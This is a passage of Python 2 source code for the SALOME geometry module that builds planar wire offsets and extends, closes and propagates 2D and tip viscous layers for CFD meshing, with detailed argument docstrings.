plane = geompy.MakePlane(some_vertex_from_wire, normal, wire_length * 1e3)
common = geompy.MakeCommon(wire, plane)
if GeometricalEquality([wire, common], tol = 1) == False:
print "[X] The input wire should be planar."; return
#-
# Create offsets
nb_loops = nb_edges
if wire_is_closed:
nb_loops += 1
edges.append(edges[0])
offsets = []
contact_vertexes = []
edge_turn_angles = []
for i in range(nb_loops):
edge = edges[i]
offset = None
try:
offset = MakeEdgeOffset(dist, edge, np = np, plane = plane, curv = curv, add = False)
except:
dist = -dist
offset = MakeEdgeOffset(dist, edge, np = np, plane = plane, curv = curv, add = False)
if i > 0:
# Get the previous edge and offset
previous_edge = edges[i - 1]
previous_offset = offsets[i - 1]
current_edges = [previous_edge, edge]
current_offsets = [previous_offset, offset]
#-
# Get contact vertex
contact_vertex = geompy.MakeVertexOnLinesIntersection(previous_edge, edge)
contact_vertexes.append(contact_vertex)
#-
# Get edge orientations
edge_orientations = []
for j in range(2):
each_edge = current_edges[j]
vertex = geompy.MakeVertexOnCurve(each_edge, 0)
distance_from_contact = geompy.MinDistance(vertex, contact_vertex)
if distance_from_contact <= tol:
edge_orientations.append("out")
else:
edge_orientations.append("in")
#-
# Get edge directions close to contact vertex
edge_directions = []
for j in range(2):
each_edge = current_edges[j]
if edge_orientations[j] == "in":
parameter_1 = 1.0
parameter_2 = 1.0 - small_value
else:
parameter_1 = 0.0
parameter_2 = 0.0 + small_value
v1 = geompy.MakeVertexOnCurve(each_edge, parameter_1)
v2 = geompy.MakeVertexOnCurve(each_edge, parameter_2)
edge_direction = geompy.MakeVector(v1, v2)
edge_direction = GetNormalizedVector(edge_direction, add = False)
edge_directions.append(edge_direction)
#-
# Get the turn angle difference between edges
edge_turn_angle = GetTurnAngle(edge_directions[0], edge_directions[1], normal, unit = "deg")
edge_turn_angles.append(edge_turn_angle)
#-
# Get the offset edge directions
offset_directions = []
for j in range(2):
each_edge = current_edges[j]
each_offset = current_offsets[j]
if edge_orientations[j] == "in":
parameter = 1.0
else:
parameter = 0.0
v1 = geompy.MakeVertexOnCurve(each_edge, parameter)
v2 = geompy.MakeVertexOnCurve(each_offset, parameter)
offset_direction = geompy.MakeVector(v1, v2)
offset_direction = GetNormalizedVector(offset_direction, add = False)
offset_directions.append(offset_direction)
#-
# Get the turn angle difference between edges
offset_turn_angle = GetTurnAngle(offset_directions[0], offset_directions[1], normal, unit = "deg")
#-
# Reverse the offset if necessary
turn_angle_difference = abs(offset_turn_angle - edge_turn_angle)
if abs(180.0 - turn_angle_difference) > 10.0:
offset = MakeEdgeOffset( -dist, edge, np = np, plane = plane, curv = curv, add = False)
#-
offsets.append(offset)
#-
tri_edge_faces = []
linking_arcs = []
if simple == False:
# Link offsets
for i in range(nb_loops):
if i > 0:
offset = offsets[i]
previous_offset = offsets[i - 1]
current_offsets = [previous_offset, offset]
contact_vertex = contact_vertexes[i - 1]
edge_turn_angle = edge_turn_angles[i - 1]
# Detect intersection
offsets_are_intersected = False
intersection = geompy.MakeSection(previous_offset, offset)
if geompy.NumberOfSubShapes(intersection, geompy.ShapeType["VERTEX"]) == 1:
offsets_are_intersected = True
#-
if offsets_are_intersected:
# Trim the offsets
for j in range(2):
each_edge = current_edges[j]
each_offset = current_offsets[j]
# Partition the offset
partitioned_offset = geompy.MakePartition([each_offset], [intersection])
#-
# Keep the suitable edge
partitioned_offset_edges = geompy.SubShapeAll(partitioned_offset, geompy.ShapeType["EDGE"])
max_distance = 0
for partitioned_offset_edge in partitioned_offset_edges:
distance = geompy.MinDistance(contact_vertex, partitioned_offset_edge)
if distance > max_distance:
new_offset = partitioned_offset_edge
max_distance = distance
#-
# Update the offset list
offsets[i - 1 + j] = new_offset
#-
#-
else:
if abs(180.0 - edge_turn_angle) <= angle:# For small angles...
# Extend the offsets
extended_offsets = ExtendSplinesToIntersection(current_offsets, np, tol, add = False)
#-
# Update the offset list
for j in range(2):
offsets[i - 1 + j] = extended_offsets[j]
#-
else:# For big angles...
# Get the offset boundary end
boundary_vertexes = []
for j in range(2):
each_offset = current_offsets[j]
boundary_vertex = geompy.GetShapesNearPoint(each_offset, contact_vertex, geompy.ShapeType["VERTEX"])
boundary_vertex = geompy.SubShapeAll(boundary_vertex, geompy.ShapeType["VERTEX"])[0]
boundary_vertexes.append(boundary_vertex)
#-
# Create the circle arc linking offsets
linking_arc = geompy.MakeArcCenter(contact_vertex, boundary_vertexes[0], boundary_vertexes[1])
linking_arcs.append(linking_arc)
#-
# Create the tri - angle face
edge_1 = geompy.MakeEdge(contact_vertex, boundary_vertexes[0])
edge_2 = geompy.MakeEdge(contact_vertex, boundary_vertexes[1])
tri_angle_face = geompy.MakeFaceWires([edge_1, edge_2, linking_arc], isPlanarWanted = True)
tri_edge_faces.append(tri_angle_face)
#-
if i == 1 and wire_is_closed:
offsets[-1] = offsets[0]
#-
if wire_is_closed:
edges[0] = edges[-1]
offsets[0] = offsets[-1]
del edges[-1]
del offsets[-1]
if dim == 1:
to_return = offsets + linking_arcs
to_return_name = "WireOffset (Edge)"
if single == True:
try:
offset_wire = geompy.MakeWire(offsets + linking_arcs)
except:
offset_wire = geompy.MakeCompound(offsets + linking_arcs)
to_return = offset_wire
to_return_name = "WireOffset"
else:
# Rebuild edges if necessary
if rebuild == True:
for i in range(nb_edges):
edge = edges[i]
offset = offsets[i]
parameter_list = DiscretizeEdgeByCurvature(edge, np, dim = -1)
edge = RebuildSpline(parameter_list, edge, add = False)
offset = RebuildSpline(parameter_list, offset, add = False)
edges[i] = edge
offsets[i] = offset
#-
# Link edges to offsets
linking_faces = []
for i in range(nb_edges):
edge = edges[i]
offset = offsets[i]
##########################################
linking_face = geompy.MakeQuad2Edges(edge, offset) # This shown better meshing quality
#tmp_compound = geompy.MakeCompound([edge, offset])
#linking_face = geompy.MakeFilling(tmp_compound, theMethod = GEOM.FOM_AutoCorrect)
##########################################
linking_faces.append(linking_face)
#-
to_return = linking_faces + tri_edge_faces
to_return_name = "WireOffset (Face)"
if single == True:
try:
shell = geompy.MakeShell(linking_faces + tri_edge_faces)
except:
shell = geompy.MakeCompound(linking_faces + tri_edge_faces)
to_return = shell
to_return_name = "WireOffset (Faces)"
# Add and return the resulting shape(s)
if add == True:
slow_add = False
if not isinstance(to_return, list) or single == True: slow_add = True
AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
if slow_add == False:
if salome.sg.hasDesktop():
salome.sg.updateObjBrowser(1)
return to_return
#-
mpwo = MakePlanarWireOffset
def ExtendViscousLayer( dist, wire = None, face = None, plane = None, scale = 1, ratio = 1, style = "smooth", coef = 0.5, tol = 1e-7, rev = False, add = True, infa = False, dim = 1 ):
"""
Description:
Extends a 2D trailing edge viscous layer.
Arguments:
# dist
Description: The length of the extension.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# wire
Description: The input wire.
Type: Wire
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# face
Description: See here.
Type: Face
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# plane
Description: See here. If the input edge is straight, the default plane is the OXY plane.
Type: Face
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# scale
Description: The scale coefficient applied on the source middle edge before being "projected" on the end wire.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
# ratio
Description: The ratio between the ending wire and the input wire lengthes.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
# style
Description: See here.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "smooth"
# coef
Description: A coefficient influencing the curvature of the extension edges (0 < coef < 1). The greater it is, the greater is the curvature.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 0.5
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# rev
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 1
"single" value: -
Type: Compound of Edges
Number: 1
Name: "ViscousLayerExtension"
"dim" value: 2
"single" value: -
Type: Shell or Compound of Faces
Number: 1
Name: "ViscousLayerExtension (Faces)"
Conditions of use:
The input wire has to contain two or three connected edges.
In addition, if the input wire is straight, it is also necessary to set the face or the plane argument so as to give the function the extension direction
"""
if dim not in [1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
wire = GetGUISelection(wire)
[wire, face, plane] = GetObject([wire, face, plane])
#-
# Make this function recursive
if isinstance(wire, list):
return_list = []
for sub_object in wire:
return_list.append(ExtendViscousLayer(dist, sub_object, face, plane, scale, ratio, style, coef, tol, rev, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [wire, face, plane] or None in [wire]: return
#-
# Set father object
father = None
if infa == True: father = wire
#-
if False: pass
else:# All checks done
dist = float(dist)
wire_edges = GetSubShapes(wire)[1]
try:
wire = geompy.MakeWire(wire_edges)
except:
print "[X] The input shape should be \"wire-shaped\"."; return
# Get the sub-shapes
wire = GetSubShapes(wire)
#-
# Sort vertexes
extremum_vertexes = []
inside_vertexes = []
for wire_vertex in wire[0]:
nb_contacts = 0
for wire_edge in wire[1]:
min_distance = geompy.MinDistance(wire_edge, wire_vertex)
if min_distance == 0:
nb_contacts += 1
if nb_contacts == 2:
inside_vertexes.append(wire_vertex)
else:
extremum_vertexes.append(wire_vertex)
#-
# Get number of edges in the wire
edge_number = len(wire[1])
#-
# Get the wire length
wire_length = geompy.BasicProperties(wire[-1])[0]
#-
if edge_number == 3: # If the foil trailing edge is thicker than zero...
# Get middle edge size
middle_edge_length = geompy.MinDistance(inside_vertexes[0], inside_vertexes[1])
#-
# Get virtual wire size
wire_length -= middle_edge_length
middle_edge_length *= scale
wire_length += middle_edge_length
#-
# Create the closing edge
closing_edge = geompy.MakeEdge(extremum_vertexes[0], extremum_vertexes[1])
#-
# Get the extension direction
if face == None:# If no face is given by the user...
# Close the wire
closed_contour = geompy.MakeWire([wire[-1], closing_edge])
#-
if plane == None:# And if no plane is given by the user...
if abs(geompy.BasicProperties(closing_edge)[0] - geompy.BasicProperties(wire[-1])[0]) < tol:# If the input wire is straight...
# Use the OXY plane
plane = geompy.MakeFaceHW(10, 10, 1)
#-
else:
# Get the wire plane
plane = geompy.MakeFace(closed_contour, True)
#-
# Get the plane normal
normal = geompy.GetNormal(plane)
#-
# Extrude the closing edge
face = geompy.MakePrismVecH(closing_edge, normal, 0.1)
#-
extension_direction = geompy.GetNormal(face)
#-
# Create the end edge
if dist == None:
wire_length = geompy.BasicProperties(wire[-1])[0]
dist = wire_length * 3
print "[i] No offset distance given > default one:", dist
if rev == True:
dist *= -1.0
end_edge = geompy.MakeTranslationVectorDistance(closing_edge, extension_direction, dist)
#-
if ratio != 1:
# Get the end edge middle vertex
end_edge_middle_vertex = geompy.MakeVertexOnCurve(end_edge, 0.5)
#-
# Scale the end edge
end_edge_length = geompy.BasicProperties(end_edge)[0]
end_edge_length *= ratio
scaled_end_edge_first_vertex = geompy.MakeTranslationVectorDistance(end_edge_middle_vertex, end_edge, -end_edge_length / 2)
scaled_end_edge_last_vertex = geompy.MakeTranslationVectorDistance(end_edge_middle_vertex, end_edge, end_edge_length / 2)
end_edge = geompy.MakeEdge(scaled_end_edge_first_vertex, scaled_end_edge_last_vertex)
#-
# Create the inside extension edges
inside_extension_edges = []
inside_end_edge_vertexes = []
for i in range(edge_number - 1):
extremum_edge_length = geompy.MinDistance(inside_vertexes[i], extremum_vertexes[i])
end_ratio = extremum_edge_length / wire_length
if i == 1:
end_ratio = 1.0 - end_ratio
inside_end_edge_vertex = geompy.MakeVertexOnCurve(end_edge, end_ratio)
inside_end_edge_vertexes.append(inside_end_edge_vertex)
inside_extension_edge = geompy.MakeEdge(inside_vertexes[i], inside_end_edge_vertex)
if style == "smooth":
inside_extension_edge_middle_vertex = geompy.MakeVertexOnCurve(inside_extension_edge, 0.5)
translated_inside_extension_edge_middle_vertex = geompy.MakeTranslationVectorDistance(inside_extension_edge_middle_vertex, extension_direction, dist / 2 * coef)
inside_extension_edge = geompy.MakeInterpol([inside_vertexes[i], translated_inside_extension_edge_middle_vertex, inside_end_edge_vertex])
inside_extension_edges.append(inside_extension_edge)
#-
# Create extremum extension edges
extremum_extension_edges = []
end_edge_vertexes = geompy.SubShapeAll(end_edge, geompy.ShapeType["VERTEX"])
for i in range(2):
extremum_extension_edge = geompy.MakeEdge(end_edge_vertexes[i], extremum_vertexes[i])
if style == "smooth":
extremum_extension_edge_middle_vertex = geompy.MakeVertexOnCurve(extremum_extension_edge, 0.5)
TranslatedExtremumExtensionEdgeMiddleVertex = geompy.MakeTranslationVectorDistance(extremum_extension_edge_middle_vertex, extension_direction, dist / 2 * coef)
#extremum_extension_edge = geompy.MakeInterpol([end_edge_vertexes[i], TranslatedExtremumExtensionEdgeMiddleVertex, extremum_vertexes[i]])
extremum_extension_edge = geompy.MakeInterpol([extremum_vertexes[i], TranslatedExtremumExtensionEdgeMiddleVertex, end_edge_vertexes[i]])
extremum_extension_edges.append(extremum_extension_edge)
#-
extension_edges = inside_extension_edges + extremum_extension_edges
# Partition end edge
end_edge_partition = geompy.MakePartition([end_edge], inside_end_edge_vertexes)
end_edges = geompy.SubShapeAll(end_edge_partition, geompy.ShapeType["EDGE"])
#-
if dim == 1:
extension_edges = geompy.MakeCompound(extension_edges + end_edges)
to_return = extension_edges
to_return_name = "ViscousLayerExtension"
else:
inside_extension_edge_compound = geompy.MakeCompound(inside_extension_edges)
faces = []
for extremum_extension_edge in extremum_extension_edges:
some_vertex = geompy.MakeVertexOnCurve(extremum_extension_edge, 0)
inside_extension_edge = geompy.GetShapesNearPoint(inside_extension_edge_compound, some_vertex, geompy.ShapeType["EDGE"])
face = geompy.MakeQuad2Edges(inside_extension_edge, extremum_extension_edge)
faces.append(face)
if len(inside_extension_edges) == 2:
face = geompy.MakeQuad2Edges(inside_extension_edges[0], inside_extension_edges[1])
faces.append(face)
# Create the output shell
shell = geompy.MakeShell(faces)
#-
to_return = shell
to_return_name = "ViscousLayerExtension (Faces)"
# Add and return the resulting shape(s)
if add == True:
AddToStudy(to_return, to_return_name, father)
return to_return
#-
evl = ExtendViscousLayer
def CloseViscousLayer( wire = None, dist = "auto", face = None, plane = None, style = "smooth", tol = 1e-7, rev = False, add = True, infa = False, dim = 1 ):
"""
Description:
Closes a 2D viscous layer.
Arguments:
# wire
Description: The input wire.
Type: Wire
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# dist
Description: The length of the closure. If equals "auto", the length is automatically calculated by the function.
Type: Float or String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "auto"
# face
Description: See here.
Type: Face
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# plane
Description: See here. If the input edge is straight, the default plane is the OXY plane.
Type: Face
GUI selection: -
Selection by name: yes
Recursive: -
Default value: None
# style
Description: See here.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "smooth"
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# rev
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1
Returned Values:
"dim" value: 1
"single" value: -
Type: Compound of Edges
Number: 1
Name: "ViscousLayerClosing"
"dim" value: 2
"single" value: -
Type: Shell or Compound of Faces
Number: 1
Name: "ViscousLayerClosing (Faces)"
Conditions of use:
The input wire has to contain two or three connected edges.
In this case, the smooth style can only be used if the wire is straight. Finally, if the input wire is straight, it is also necessary to set the face or the plane argument so as the function knows the closing direction.
"""
if dim not in [1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
wire = GetGUISelection(wire)
[wire, face, plane] = GetObject([wire, face, plane])
#-
# Make this function recursive
if isinstance(wire, list):
return_list = []
for sub_object in wire:
return_list.append(CloseViscousLayer(sub_object, dist, face, plane, style, tol, rev, add, infa, dim))
return return_list
#-
# Check the input shape existence
if "error" in [wire, face, plane] or None in [wire]: return
#-
# Set father object
father = None
if infa == True: father = wire
#-
if False: pass
else:# All checks done
if not isinstance(dist, str):
dist = float(dist)
wire_edges = GetSubShapes(wire)[1]
try:
wire = geompy.MakeWire(wire_edges)
except:
print "[X] The input shape should be \"wire-shaped\"."; return
# Get the sub-shapes
wire = GetSubShapes(wire)
#-
# Sort the wire vertexes
wire_vertexes = geompy.SubShapeAll(wire[-1], geompy.ShapeType["VERTEX"])
inside_vertexes = []
outside_vertexes = []
for wire_vertex in wire_vertexes:
nb_contacts = 0
for edge in wire[1]:
min_distance = geompy.MinDistance(edge, wire_vertex)
if min_distance == 0:
nb_contacts += 1
if nb_contacts == 2:
inside_vertexes.append(wire_vertex)
else:
outside_vertexes.append(wire_vertex)
#-
# Get the closing direction
if face == None:# If no face is given by the user...
# Close the wire
closing_edge = geompy.MakeEdge(outside_vertexes[0], outside_vertexes[1])
closed_contour = geompy.MakeWire([wire[-1], closing_edge])
#-
if plane == None:# And if no plane is given by the user...
if abs(geompy.BasicProperties(closing_edge)[0] - geompy.BasicProperties(wire[-1])[0]) < tol:# If the input wire is straight...
# Use the OXY plane
plane = geompy.MakeFaceHW(10, 10, 1)
#-
else:
# Get the wire plane
plane = geompy.MakeFace(closed_contour, True)
#-
# Get the plane normal
normal = geompy.GetNormal(plane)
#-
# Extrude the closing edge
face = geompy.MakePrismVecH(closing_edge, normal, 0.1)
#-
normal_vector = geompy.GetNormal(face)
#-
# Create the inside vertex compound
inside_vertex_compound = geompy.MakeCompound(inside_vertexes)
#-
# Get the external edges
external_edges = []
for edge in wire[1]:
nb_contacts = 0
for inside_vertex in inside_vertexes:
min_distance = geompy.MinDistance(inside_vertex, edge)
if min_distance == 0:
nb_contacts += 1
if nb_contacts == 1:
external_edges.append(edge)
#-
# Calculate the closing thickness
if dist == "auto":
total_external_edge_length = 0
for external_edge in external_edges:
total_external_edge_length += geompy.BasicProperties(external_edge)[0]
dist = total_external_edge_length / 2
if rev == True:
dist *= -1.0
#-
output_edges = []
# Close the external edges
translated_inside_vertexes = []
for external_edge in external_edges:# For each external edge...
external_edge_vertexes = geompy.SubShapeAll(external_edge, geompy.ShapeType["VERTEX"])
# Sort the vertexes
external_edge_inside_vertex = None
external_edge_outide_vertex = None
for external_edge_vertex in external_edge_vertexes:
min_distance = geompy.MinDistance(external_edge_vertex, inside_vertex_compound)
if min_distance == 0:
external_edge_inside_vertex = external_edge_vertex
else:
external_edge_outide_vertex = external_edge_vertex
#-
# Translate the inside vertex
translated_inside_vertex = geompy.MakeTranslationVectorDistance(external_edge_inside_vertex, normal_vector, dist)
translated_inside_vertexes.append(translated_inside_vertex)
#-
# Create the closing edges
if style == "straight":
outside_closing_edge = geompy.MakeEdge(external_edge_outide_vertex, translated_inside_vertex)
elif style == "smooth":
outside_closing_edge = geompy.MakeArcOfEllipse(external_edge_inside_vertex, external_edge_outide_vertex, translated_inside_vertex)
inside_closing_edge = geompy.MakeEdge(external_edge_inside_vertex, translated_inside_vertex)
#-
output_edges.append(outside_closing_edge)
output_edges.append(inside_closing_edge)
if len(wire[1]) == 3:# If there are three edges in the input wire...
# Close the closing
closing_closing_edge = geompy.MakeEdge(translated_inside_vertexes[0], translated_inside_vertexes[1])
output_edges.append(closing_closing_edge)
#-
if len(wire[1]) == 2:# If there are two edges in the input wire...
# Create the output edge compound
output_edge_compound = geompy.MakeCompound(output_edges)
#-
# Glue the edges
glued_output_edge_compound = geompy.MakeGlueEdges(output_edge_compound, tol)
#-
# Explode the glued compound
output_edges = geompy.SubShapeAll(glued_output_edge_compound, geompy.ShapeType["EDGE"])
#-
if dim == 1:
# Put the output edges into a compound
output_edges = geompy.MakeCompound(output_edges)
#-
to_return = output_edges
to_return_name = "ViscousLayerClosing"
else:
face = geompy.MakeFaceWires(external_edges[0:1] + output_edges[0:2], isPlanarWanted = True)
faces = [face]
if len(wire[1]) == 3:# If there are three edges in the input wire...
face = geompy.MakeFaceWires(external_edges[1:2] + output_edges[2:4], isPlanarWanted = True)
faces.append(face)
face = geompy.MakeQuad2Edges(output_edges[1], output_edges[3])
faces.append(face)
if len(wire[1]) == 2:# If there are two edges in the input wire...
face = geompy.MakeFaceWires(external_edges[1:2] + output_edges[1:3], isPlanarWanted = True)
faces.append(face)
# Put the output faces into a shell
shell = geompy.MakeShell(faces)
#-
to_return = shell
to_return_name = "ViscousLayerClosing (Faces)"
# Add and return the resulting shape(s)
if add == True:
AddToStudy(to_return, to_return_name, father)
return to_return
#-
cvl = CloseViscousLayer
def PropagateViscousLayerIntersection( compound = None, dir = "auto", tol = 1e-7, add = True, infa = False ):
"""
Description:
Propagates the intersection into two intersecting viscous layers.
Arguments:
# compound
Description: The source compound of edges.
Type: Compound of Edges
GUI selection: yes
Selection by name: yes
Recursive: yes
Default value: None
# dir
Description: Equals "x", "y" or "z" to impose the approximate direction of the propagation, "auto" to let the function decide by itself. (Used to sort intersection vertexes.)
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "auto"
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-7
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
Returned Values:
"dim" value: -
"single" value: -
Type: Compound of Edges
Number: 1
Name: "IntersectionPropagation"
Conditions of use:
The source compound has to be planar and must contain only "parallel" edges (in the "blocking" sense).
"""
# Get the input shape(s)
compound = GetGUISelection(compound)
compound = GetObject(compound)
#-
# Make this function recursive
if isinstance(compound, list):
return_list = []
for sub_object in compound:
return_list.append(PropagateViscousLayerIntersection(sub_object, dir, tol, add, infa))
return return_list
#-
# Check the input shape existence
if "error" in [compound] or None in [compound]: return
#-
# Set father object
father = None
if infa == True: father = compound
#-
if False: pass
else:# All checks done
# Get the sub-shapes
compound = GetSubShapes(compound)
#-
# Get the intersection vertexes
partition = geompy.MakePartition([compound[-1]], Limit = geompy.ShapeType["VERTEX"])
partition_vertexes = geompy.SubShapeAll(partition, geompy.ShapeType["VERTEX"])
intersection_vertexes = []
for partition_vertex in partition_vertexes:
is_intersection_vertex = True
for compound_vertex in compound[0]:
distance = geompy.MinDistance(partition_vertex, compound_vertex)
if distance == 0:
is_intersection_vertex = False
if is_intersection_vertex == True:
intersection_vertexes.append(partition_vertex)
#-
# Get the compound plane
quadrangle_face = geompy.MakeQuad2Edges(compound[1][0], compound[1][1])
#-
# Get the compound plane normal
compound_plane_normal = geompy.GetNormal(quadrangle_face)
#-
# Extrude compound edges
compound_edge_extensions = []
for compound_edge in compound[1]:
compound_edge_extension = geompy.MakePrismVecH(compound_edge, compound_plane_normal, 0.1)
compound_edge_extensions.append(compound_edge_extension)
#-
# Get the dimension used to sort the intermediate vertexes
if dir == "x":
sorting_dimension = 0
elif dir == "y":
sorting_dimension = 1
elif dir == "z":
sorting_dimension = 2
#-
# Create intermediate edges
intermediate_edges = []
for intersection_vertex in intersection_vertexes:# For each intersection vertex...
# Project intersection vertex on extruded edges
projected_vertexes = []
for compound_edge_extension in compound_edge_extensions:
projected_vertex = geompy.MakeProjection(intersection_vertex, compound_edge_extension)
projected_vertexes.append(projected_vertex)
#-
# Get the number of projected vertexes
nb_projected_vertexes = len(projected_vertexes)
#-
# Get the sorting dimension if "auto" enabled
if dir == "auto":
projected_vertex_compound = geompy.MakeCompound(projected_vertexes)
bounding_box = geompy.BoundingBox(projected_vertex_compound)
dx = abs(bounding_box[1] - bounding_box[0])
dy = abs(bounding_box[2] - bounding_box[1])
dz = abs(bounding_box[3] - bounding_box[2])
if max(dx, dy, dz) == dx:
sorting_dimension = 0
elif max(dx, dy, dz) == dy:
sorting_dimension = 1
elif max(dx, dy, dz) == dz:
sorting_dimension = 2
#-
# Reorder projected vertexes
reorder_projected_vertexes = []
resting_vertexes = projected_vertexes[:]
next_vertex_index = 0
for i in range(nb_projected_vertexes):# Each time they are projected vertex left...
vertex_index = 0
min_position = 1e99
for resting_vertex in resting_vertexes:
resting_vertex_position = geompy.PointCoordinates(resting_vertex)[sorting_dimension]
if resting_vertex_position < min_position:
next_vertex_index = vertex_index
min_position = resting_vertex_position
vertex_index += 1
next_vertex = resting_vertexes[next_vertex_index]
reorder_projected_vertexes.append(next_vertex)
del resting_vertexes[next_vertex_index]
#-
# Create intermediate edges
for reordered_vertex_index in range(nb_projected_vertexes - 1):
first_intermediate_edge_vertex = reorder_projected_vertexes[reordered_vertex_index]
second_intermediate_edge_vertex = reorder_projected_vertexes[reordered_vertex_index + 1]
distance = geompy.MinDistance(first_intermediate_edge_vertex, second_intermediate_edge_vertex)
if distance > tol:
intermediate_edge = geompy.MakeEdge(first_intermediate_edge_vertex, second_intermediate_edge_vertex)
intermediate_edges.append(intermediate_edge)
#-
#-
# Partition the whole geometry
edges = compound[1] + intermediate_edges
partition = geompy.MakePartition(edges)
#-
# Add and return the resulting shape(s)
if add == True:
AddToStudy(partition, "PropagatedIntersection", father)
return partition
#-
pvli = PropagateViscousLayerIntersection
def MakeTipViscousLayer( dist, offset, foil = None, style = "smooth", np = 60, curv = True, tol = 1e-4, by_param = False, rev = False, add = True, infa = False, dim = 3 ):
"""
Description:
Creates a tip viscous layer volume following a foil edge.
Arguments:
# dist
Description: The offset distance normal to the wing tip.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: -
# offset
Description: The edge describing the offset of the viscous layer in the wing tip plane.
Type: Edge
GUI selection: -
Selection by name: yes
Recursive: -
Default value: -
# foil
Description: The edge touching the wing tip.
Type: Edge
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# style
Description: See here.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: "smooth"
# np
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 40
# curv
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# tol
Description: See here.
Type: Float
GUI selection: -
Selection by name: -
Recursive: -
Default value: 1e-4
# by_param
Description: Defines if the function has to create two points at the same position on the foil edge and on the offset edge respectively by using a same distance from the edge start (True) or the same parameter on the edge (False). In some cases, switch this parameter can give better results.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# rev
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# add
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: True
# infa
Description: See here.
Type: Boolean
GUI selection: -
Selection by name: -
Recursive: -
Default value: False
# dim
Description: See here.
Type: Integer
GUI selection: -
Selection by name: -
Recursive: -
Default value: 3
Returned Values:
"dim" value: 1
"single" value: -
Type: Compound of Edge
Number: 2
Name: "TipViscousLayer (Edges)"
"dim" value: 2
"single" value: -
Type: Compound of Faces
Number: 1
Name: "TipViscousLayer (Faces)"
"dim" value: 3
"single" value: -
Type: Solid
Number: 1
Name: "TipViscousLayer"
Conditions of use:
The input edges have to be open.
"""
if dim == 0: print "[X] There is no shape to return corresponding to the given dimension."; return
# Get the input shape(s)
foil = GetGUISelection(foil, uniq = True)
[foil, offset] = GetObject([foil, offset])
#-
# Check the input shape existence
if "error" in [foil, offset] or None in [foil, offset]: return
#-
# Set father object
father = None
if infa == True: father = foil
#-
if False: pass
else:# All checks done
# Get the sub-shapes
[foil, offset] = GetSubShapes([foil, offset])
#-
# Get the edge lengths
foil_length = geompy.BasicProperties(foil[-1])[0]
offset_length = geompy.BasicProperties(offset[-1])[0]
#-
# Get the offset edge sense
linking_edge_1 = geompy.MakeEdge(foil[0][0], offset[0][0])
linking_edge_2 = geompy.MakeEdge(foil[0][0], offset[0][1])
linking_edge_1_length = geompy.BasicProperties(linking_edge_1)[0]
linking_edge_2_length = geompy.BasicProperties(linking_edge_2)[0]
reverse_length = False
if linking_edge_1_length > linking_edge_2_length:
reverse_length = True
#-
# Get the foil normal vector
face = geompy.MakeQuad2Edges(foil[-1], offset[-1])
normal_vector = geompy.GetNormal(face)
#-
filling_edges_3d = []
filling_edges_2d = []
boundary_faces = []
if rev == True:
dist *= -1.0
if curv == True:
parameter_list = DiscretizeEdgeByCurvature(foil[-1], np, dim = -1)
else:
parameter_list = [n / float(np) for n in range(np + 1)]
#-
# Create the offset vertexes
for parameter in parameter_list:# For each position on the foil edge...
#for parameter in [1 - n / float(np - 1) for n in range(np)]:# For each position on the foil edge...
# Create the vertexes
if by_param == True:
foil_vertex = geompy.MakeVertexOnCurve(foil[-1], parameter)
else:
foil_vertex = geompy.MakeVertexOnCurveByLength(foil[-1], parameter * foil_length, foil[0][0])
if reverse_length == True:
parameter = 1.0 - parameter
if by_param == True:
offset_vertex = geompy.MakeVertexOnCurve(offset[-1], parameter)
else:
offset_vertex = geompy.MakeVertexOnCurveByLength(offset[-1], parameter * offset_length, offset[0][0])
translated_vertex = geompy.MakeTranslationVectorDistance(foil_vertex, normal_vector, dist)
#-
# Create the 2D filling edge
filling_edge_2d = geompy.MakeEdge(foil_vertex, offset_vertex)
filling_edges_2d.append(filling_edge_2d)
#-
# Create the 3D filling edge
if style == "smooth":
